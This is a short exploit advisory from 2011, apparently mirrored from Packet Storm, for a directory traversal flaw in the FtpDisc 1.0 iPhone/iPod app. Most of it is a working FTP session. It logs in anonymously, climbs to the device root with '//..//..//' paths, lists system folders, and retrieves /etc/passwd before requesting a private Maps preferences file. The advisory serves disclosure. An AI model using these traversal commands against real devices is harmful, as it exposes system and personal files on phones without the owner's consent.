FtpDisc version 1.0 for iPhone / iPod Touch suffers from a directory traversal vulnerability.
eb9433225fdf663747b620db7efef35612cc715163043d9831963dbf316fe129# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the FtpDisc.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 documents
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 other
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 photos
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x 1 nobody nobody 0 Aug 3 201012:41 .file
dr-xr-xr-x 1 nobody nobody 1428 Feb 8 12:50 Applications
dr-xr-xr-x 1 nobody nobody 68 Aug 19 2010 4:10 Developer
dr-xr-xr-x 1 nobody nobody 884 Jan 12 12:53 Library
dr-xr-xr-x 1 nobody nobody 102 Aug 19 2010 4:18 System
dr-xr-xr-x 1 nobody nobody 306 Feb 8 11:48 User
dr-xr-xr-x 1 nobody nobody 2074 Jan 13 9:52 bin
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 boot
-r-xr-xr-x 1 nobody nobody 638 Jan 25 15:30 control
dr-xr-xr-x 1 nobody nobody 68 Aug 3 201012:41 cores
1 nobody nobody 68 1 dev
dr-xr-xr-x 1 nobody nobody 918 Jan 26 11:34 etc
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 lib
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 mnt
dr-xr-xr-x 1 nobody nobody 136 Oct 23 201015:12 private
dr-xr-xr-x 1 nobody nobody 1666 Jan 13 9:52 sbin
drwxrwxrwx 1 nobody nobody 272 Feb 22 16:02 tmp
dr-xr-xr-x 1 nobody nobody 374 Jan 13 9:52 usr
dr-xr-xr-x 1 nobody nobody 1088 Oct 26 2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed